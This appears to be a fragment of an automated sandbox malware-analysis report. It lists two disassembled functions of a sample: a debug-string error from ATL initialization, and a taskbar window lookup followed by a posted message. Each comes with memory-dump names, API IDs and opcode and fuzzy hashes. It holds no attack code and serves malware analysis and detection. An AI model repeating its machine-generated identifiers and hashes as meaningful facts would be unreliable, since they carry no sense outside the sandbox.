                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A6100A), ref: 00A9B553
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A9B54E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      • Opcode ID: 60d960318085e454798368787973f0cb26f5b5d348a79e470d9d051afb3b9c09
                                                      • Instruction ID: c00e46dbe2204bebca2db68ebf18893656dbb9fd86872dcdb35158baa67c61e1
                                                      • Opcode Fuzzy Hash: 60d960318085e454798368787973f0cb26f5b5d348a79e470d9d051afb3b9c09
                                                      • Instruction Fuzzy Hash: 34E06D70210351CFDB20DF68E6087427BE0AB04754F01896CE457C72A0DBB4D449CB61
                                                      Function 00AE5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AE5BF5
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AE5C08
                                                        • Part of subcall function 00AC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC555E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 6a824620d6bdc3e4e93d14071484b3017ceb94315afc512923f5d1dcef28fc45
                                                      • Instruction ID: bdc0c0eabbadae08cab14ea603f5b1b5694ce730ab0d54ac17d3ae576188e3ef
                                                      • Opcode Fuzzy Hash: 6a824620d6bdc3e4e93d14071484b3017ceb94315afc512923f5d1dcef28fc45
                                                      • Instruction Fuzzy Hash: C6D0A931388340BBE728ABB0AC8BFD36A10EB40B00F000828B205AA0E0C8E46841C310